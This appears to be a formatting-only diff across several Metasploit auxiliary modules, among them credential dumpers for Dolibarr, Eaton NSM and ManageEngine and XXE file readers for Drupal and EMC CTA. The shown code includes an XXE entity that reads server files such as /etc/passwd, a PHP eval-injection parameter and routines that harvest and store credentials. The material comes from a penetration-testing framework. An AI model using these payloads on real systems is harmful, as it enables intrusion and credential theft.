      "%7s done (%d/%d tokens)" % [percent, current, total])
@@ -177,6 +186,7 @@ class MetasploitModule < Msf::Auxiliary

  def run
    return unless tokens = get_session_tokens
+
    credentials = []
    print_status("Trying to hijack a session...")
    tokens.flatten.each_with_index do |token, index|
@@ -191,8 +201,8 @@ class MetasploitModule < Msf::Auxiliary
      return
    end
    cred_table = Rex::Text::Table.new(
-      'Header'  => 'Dolibarr User Credentials',
-      'Indent'  => 1,
+      'Header' => 'Dolibarr User Credentials',
+      'Indent' => 1,
      'Columns' => ['Username', 'Password', 'Admin', 'E-mail']
    )
    credentials.each do |record|
@@ -208,17 +218,18 @@ class MetasploitModule < Msf::Auxiliary
    end
    print_line
    print_line("#{cred_table}")
-    loot_name     = 'dolibarr.traversal.user.credentials'
-    loot_type     = 'text/csv'
+    loot_name = 'dolibarr.traversal.user.credentials'
+    loot_type = 'text/csv'
    loot_filename = 'dolibarr_user_creds.csv'
-    loot_desc     = 'Dolibarr User Credentials'
+    loot_desc = 'Dolibarr User Credentials'
    p = store_loot(
      loot_name,
      loot_type,
      rhost,
      cred_table.to_csv,
      loot_filename,
-      loot_desc)
+      loot_desc
+    )
    print_status("Credentials saved in: #{p}")
  end
 end
@@ -9,23 +9,23 @@ class MetasploitModule < Msf::Auxiliary
  include REXML

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Drupal OpenID External Entity Injection',
-      'Description'    => %q{
-        This module abuses an XML External Entity Injection
-        vulnerability on the OpenID module from Drupal. The vulnerability exists
-        in the parsing of a malformed XRDS file coming from a malicious OpenID
-        endpoint. This module has been tested successfully on Drupal 7.15 and
-        7.2 with the OpenID module enabled.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Drupal OpenID External Entity Injection',
+        'Description' => %q{
+          This module abuses an XML External Entity Injection
+          vulnerability on the OpenID module from Drupal. The vulnerability exists
+          in the parsing of a malformed XRDS file coming from a malicious OpenID
+          endpoint. This module has been tested successfully on Drupal 7.15 and
+          7.2 with the OpenID module enabled.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'Reginaldo Silva', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
-      'References'     =>
-        [
+        'References' => [
          [ 'CVE', '2012-4554' ],
          [ 'OSVDB', '86429' ],
          [ 'BID', '56103' ],
@@ -33,21 +33,27 @@ class MetasploitModule < Msf::Auxiliary
          [ 'URL', 'https://github.com/drupal/drupal/commit/b9127101ffeca819e74a03fa9f5a48d026c562e5' ],
          [ 'URL', 'https://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution' ]
        ],
-      'DisclosureDate' => '2012-10-17'
-    ))
+        'DisclosureDate' => '2012-10-17',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Drupal directory path", '/drupal']),
        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"])
-      ])
-
+      ]
+    )
  end

  def xrds_file
-    element_entity = <<-EOF
-<!ELEMENT URI ANY>
-<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">
+    element_entity = <<~EOF
+      <!ELEMENT URI ANY>
+      <!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">
    EOF

    xml = Document.new
@@ -57,10 +63,11 @@ class MetasploitModule < Msf::Auxiliary
    xml.add_element(
      "xrds:XRDS",
      {
-        'xmlns:xrds'    => "xri://$xrds",
-        'xmlns'         => "xri://$xrd*($v*2.0)",
+        'xmlns:xrds' => "xri://$xrds",
+        'xmlns' => "xri://$xrd*($v*2.0)",
        'xmlns:openid' => "http://openid.net/xmlns/1.0",
-      })
+      }
+    )

    xrd = xml.root.add_element("XRD")

@@ -150,7 +157,6 @@ class MetasploitModule < Msf::Auxiliary
    service.stop
  end

-
  def on_request_uri(cli, request)
    if request.uri =~ /#{@prefix}/
      vprint_status("Signature found, parsing file...")
@@ -164,7 +170,7 @@ class MetasploitModule < Msf::Auxiliary

  def send_openid_auth(identifier)
    res = send_request_cgi({
-      'uri'    => normalize_uri(target_uri.to_s, "/"),
+      'uri' => normalize_uri(target_uri.to_s, "/"),
      'method' => 'POST',
      'vars_get' => {
        "q" => "node",
@@ -205,6 +211,7 @@ class MetasploitModule < Msf::Auxiliary

  def loot?(data)
    return false if data.blank?
+
    store(data)
    return true
  end
@@ -213,6 +220,7 @@ class MetasploitModule < Msf::Auxiliary
    return false if http_response.blank?
    return false unless http_response.code == 200
    return false unless http_response.body =~ /openid_identifier.*#{signature}/
+
    return true
  end

@@ -220,9 +228,8 @@ class MetasploitModule < Msf::Auxiliary
    return false if http_response.blank?
    return true if http_response.headers['X-Generator'] and http_response.headers['X-Generator'] =~ /Drupal/
    return true if http_response.body and http_response.body.to_s =~ /meta.*Generator.*Drupal/
+
    return false
  end

-
 end
-
@@ -8,45 +8,52 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Network Shutdown Module sort_values Credential Dumper',
-      'Description'    => %q{
-        This module will extract user credentials from Network Shutdown Module
-        versions 3.21 and earlier by exploiting a vulnerability found in
-        lib/dbtools.inc, which uses unsanitized user input inside a eval() call.
-        Please note that in order to extract credentials, the vulnerable service
-        must have at least one USV module (an entry in the "nodes" table in
-        mgedb.db).
-      },
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Network Shutdown Module sort_values Credential Dumper',
+        'Description' => %q{
+          This module will extract user credentials from Network Shutdown Module
+          versions 3.21 and earlier by exploiting a vulnerability found in
+          lib/dbtools.inc, which uses unsanitized user input inside a eval() call.
+          Please note that in order to extract credentials, the vulnerable service
+          must have at least one USV module (an entry in the "nodes" table in
+          mgedb.db).
+        },
+        'References' => [
          ['OSVDB', '83199'],
          ['URL', 'https://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/']
        ],
-      'Author'         =>
-        [
+        'Author' => [
          'h0ng10',
          'sinn3r'
        ],
-      'License'        => MSF_LICENSE,
-      'DisclosureDate' => '2012-06-26'
-    ))
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2012-06-26',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(4679)
-      ])
+      ]
+    )
  end

  def execute_php_code(code, opts = {})
    param_name = Rex::Text.rand_text_alpha(6)
-    padding    = Rex::Text.rand_text_alpha(6)
-    php_code   = Rex::Text.encode_base64(code)
-    url_param  = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
+    padding = Rex::Text.rand_text_alpha(6)
+    php_code = Rex::Text.encode_base64(code)
+    url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

    res = send_request_cgi(
      {
-        'uri'   =>  '/view_list.php',
+        'uri' => '/view_list.php',
        'method' => 'POST',
        'vars_get' =>
          {
@@ -60,14 +67,15 @@ class MetasploitModule < Msf::Auxiliary
          {
            'Connection' => 'Close'
          }
-        })
+      }
+    )
    res
  end

  def read_credentials
-    pattern   = Rex::Text.rand_text_numeric(10)
+    pattern = Rex::Text.rand_text_numeric(10)
    users_var = Rex::Text.rand_text_alpha(10)
-    user_var  = Rex::Text.rand_text_alpha(10)
+    user_var = Rex::Text.rand_text_alpha(10)
    php = <<-EOT
    $#{users_var} = &queryDB("SELECT * FROM configUsers;");
    foreach($#{users_var} as $#{user_var}) {
@@ -96,8 +104,8 @@ class MetasploitModule < Msf::Auxiliary
    end

    cred_table = Rex::Text::Table.new(
-      'Header'  => 'Network Shutdown Module Credentials',
-      'Indent'  => 1,
+      'Header' => 'Network Shutdown Module Credentials',
+      'Indent' => 1,
      'Columns' => ['Username', 'Password']
    )

@@ -108,10 +116,10 @@ class MetasploitModule < Msf::Auxiliary
    print_line
    print_line(cred_table.to_s)

-    loot_name     = "eaton.nsm.credentials"
-    loot_type     = "text/csv"
+    loot_name = "eaton.nsm.credentials"
+    loot_type = "text/csv"
    loot_filename = "eaton_nsm_creds.csv"
-    loot_desc     = "Eaton Network Shutdown Module Credentials"
+    loot_desc = "Eaton Network Shutdown Module Credentials"
    p = store_loot(loot_name, loot_type, datastore['RHOST'], cred_table.to_csv, loot_filename, loot_desc)
    print_good("Credentials saved in: #{p.to_s}")
  end
@@ -7,25 +7,31 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
-      'Description'    => %q{
-      EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
-      that allows an attacker to read arbitrary files from the file system
-      with the permissions of the root user.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
+    super(
+      update_info(
+        info,
+        'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
+        'Description' => %q{
+          EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
+          that allows an attacker to read arbitrary files from the file system
+          with the permissions of the root user.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Brandon Perry <bperry.volatile[at]gmail.com>', # metasploit module
        ],
-      'References'     =>
-        [
+        'References' => [
          ['CVE', '2014-0644'],
          ['EDB', '32623']
        ],
-      'DisclosureDate' => '2014-03-31'
-    ))
+        'DisclosureDate' => '2014-03-31',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
@@ -38,7 +44,6 @@ class MetasploitModule < Msf::Auxiliary
  end

  def run
-
    doctype = Rex::Text.rand_text_alpha(6)
    element = Rex::Text.rand_text_alpha(6)
    entity = Rex::Text.rand_text_alpha(6)
@@ -3,27 +3,35 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DNS::Enumeration

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'DNS Record Scanner and Enumerator',
-      'Description'    => %q(
-        This module can be used to gather information about a domain from a
-        given DNS server by performing various DNS queries such as zone
-        transfers, reverse lookups, SRV record brute forcing, and other techniques.
-    ),
-      'Author'         => [
-        'Carlos Perez <carlos_perez[at]darkoperator.com>',
-        'Nixawk'
-      ],
-      'License'        => MSF_LICENSE,
-      'References'     => [
-        ['CVE', '1999-0532'],
-        ['OSVDB', '492']
-      ]))
+    super(
+      update_info(
+        info,
+        'Name' => 'DNS Record Scanner and Enumerator',
+        'Description' => %q{
+          This module can be used to gather information about a domain from a
+          given DNS server by performing various DNS queries such as zone
+          transfers, reverse lookups, SRV record brute forcing, and other techniques.
+        },
+        'Author' => [
+          'Carlos Perez <carlos_perez[at]darkoperator.com>',
+          'Nixawk'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '1999-0532'],
+          ['OSVDB', '492']
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
@@ -43,7 +51,8 @@ class MetasploitModule < Msf::Auxiliary
        OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]),
        OptInt.new('THREADS', [false, 'Threads for ENUM_BRT', 1]),
        OptPath.new('WORDLIST', [false, 'Wordlist of subdomains', ::File.join(Msf::Config.data_directory, 'wordlists', 'namelist.txt')])
-      ])
+      ]
+    )

    register_advanced_options(
      [
@@ -51,7 +60,8 @@ class MetasploitModule < Msf::Auxiliary
        OptInt.new('RETRY', [false, 'Number of times to try to resolve a record if no response is received', 2]),
        OptInt.new('RETRY_INTERVAL', [false, 'Number of seconds to wait before doing a retry', 2]),
        OptBool.new('TCP_DNS', [false, 'Run queries over TCP', false])
-      ])
+      ]
+    )
    deregister_options('DnsClientUdpTimeout', 'DnsClientRetry', 'DnsClientRetryInterval', 'DnsClientTcpDns')
  end

@@ -89,6 +99,7 @@ class MetasploitModule < Msf::Auxiliary
    dns_reverse(datastore['IPRANGE'], threads) if datastore['ENUM_RVL']

    return unless datastore['ENUM_BRT']
+
    if is_wildcard
      dns_bruteforce(domain, datastore['WORDLIST'], threads) unless datastore['STOP_WLDCRD']
    else
@@ -10,40 +10,47 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',
-      'Description' => %q{
-        ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that
-        allow an unauthenticated user to obtain the superuser password of any managed Windows and
-        AS/400 hosts. This module abuses both vulnerabilities to collect all the available
-        usernames and passwords. First the agentHandler servlet is abused to get the hostid and
-        slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames
-        and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,
-        the TARGETURI has to be prepended with /event.
-      },
-      'Author' =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',
+        'Description' => %q{
+          ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that
+          allow an unauthenticated user to obtain the superuser password of any managed Windows and
+          AS/400 hosts. This module abuses both vulnerabilities to collect all the available
+          usernames and passwords. First the agentHandler servlet is abused to get the hostid and
+          slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames
+          and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,
+          the TARGETURI has to be prepended with /event.
+        },
+        'Author' => [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
        ],
-      'License' => MSF_LICENSE,
-      'References' =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
          [ 'CVE', '2014-6038' ],
          [ 'CVE', '2014-6039' ],
          [ 'OSVDB', '114342' ],
          [ 'OSVDB', '114344' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/12' ]
        ],
-      'DisclosureDate' => '2014-11-05'))
+        'DisclosureDate' => '2014-11-05',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(8400),
-        OptString.new('TARGETURI', [ true,  'Eventlog Analyzer application URI (should be /event for version 7)', '/']),
-      ])
+        OptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),
+      ]
+    )
  end

-
  def decode_password(encoded_password)
    password_xor = Rex::Text.decode_base64(encoded_password)
    password = ''
@@ -53,11 +60,10 @@ class MetasploitModule < Msf::Auxiliary
    return password
  end

-
  def run
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'agentHandler'),
-      'method' =>'GET',
+      'method' => 'GET',
      'vars_get' => {
        'mode' => 'getTableData',
        'table' => 'HostDetails'
@@ -72,7 +78,7 @@ class MetasploitModule < Msf::Auxiliary
    # When passwords have digits the XML parsing will fail.
    # Replace with an empty password attribute so that we know the device has a password
    # and therefore we want to add it to our host list.
-    xml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))
+    xml = res.body.to_s.gsub(/&#[0-9]*;/, Rex::Text.rand_text_alpha(6))
    begin
      doc = REXML::Document.new(xml)
    rescue
@@ -89,8 +95,8 @@ class MetasploitModule < Msf::Auxiliary
    end

    cred_table = Rex::Text::Table.new(
-      'Header'  => 'ManageEngine EventLog Analyzer Managed Devices Credentials',
-      'Indent'  => 1,
+      'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',
+      'Indent' => 1,
      'Columns' =>
        [
          'Host',
@@ -105,7 +111,7 @@ class MetasploitModule < Msf::Auxiliary
    slid_host_ary.each do |host|
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'hostdetails'),
-        'method' =>'GET',
+        'method' => 'GET',
        'vars_get' => {
          'slid' => host[0],
          'hostid' => host[1]
@@ -160,9 +166,9 @@ class MetasploitModule < Msf::Auxiliary
          end

          credential_core = report_credential_core({
-             password: password,
-             username: username,
-           })
+            password: password,
+            username: username,
+          })

          host_login_data = {
            address: host_ipaddress,
@@ -180,22 +186,22 @@ class MetasploitModule < Msf::Auxiliary

    print_line
    print_line("#{cred_table}")
-    loot_name     = 'manageengine.eventlog.managed_hosts.creds'
-    loot_type     = 'text/csv'
+    loot_name = 'manageengine.eventlog.managed_hosts.creds'
+    loot_type = 'text/csv'
    loot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'
-    loot_desc     = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'
+    loot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'
    p = store_loot(
      loot_name,
      loot_type,
      rhost,
      cred_table.to_csv,
      loot_filename,
-      loot_desc)
+      loot_desc
+    )
    print_status "Credentials saved in: #{p}"
  end

-
-  def report_credential_core(cred_opts={})
+  def report_credential_core(cred_opts = {})
    # Set up the has for our Origin service
    origin_service_data = {
      address: rhost,
@@ -11,19 +11,18 @@ class MetasploitModule < Msf::Auxiliary

  def initialize
    super(
-      'Name'        	=> 'Discover External IP via Ifconfig.me',
+      'Name' => 'Discover External IP via Ifconfig.me',
      'Description'	=> %q{
        This module checks for the public source IP address of the current
        route to the RHOST by querying the public web application at ifconfig.me.
        It should be noted this module will register activity on ifconfig.me,
        which is not affiliated with Metasploit.
      },
-      'Author'        => ['RageLtMan <rageltman[at]sempervictus>'],
+      'Author' => ['RageLtMan <rageltman[at]sempervictus>'],
      'License'	=> MSF_LICENSE,
-      'References'	=>
-        [
-          [ 'URL', 'http://ifconfig.me/ip' ],
-        ],
+      'References' => [
+        [ 'URL', 'http://ifconfig.me/ip' ],
+      ],
      'DefaultOptions' => { 'VHOST' => 'ifconfig.me' }
    )

@@ -31,12 +30,13 @@ class MetasploitModule < Msf::Auxiliary
      [
        Opt::RHOST('ifconfig.me'),
        OptBool.new('REPORT_HOST', [false, 'Add the found IP to the database', false])
-      ])
-end
+      ]
+    )
+  end

  def run
    connect
-    res = send_request_cgi({'uri' => '/ip', 'method' => 'GET' })
+    res = send_request_cgi({ 'uri' => '/ip', 'method' => 'GET' })

    if res.nil?
      print_error("Connection timed out")
--- a/Show More
+++ b/Show More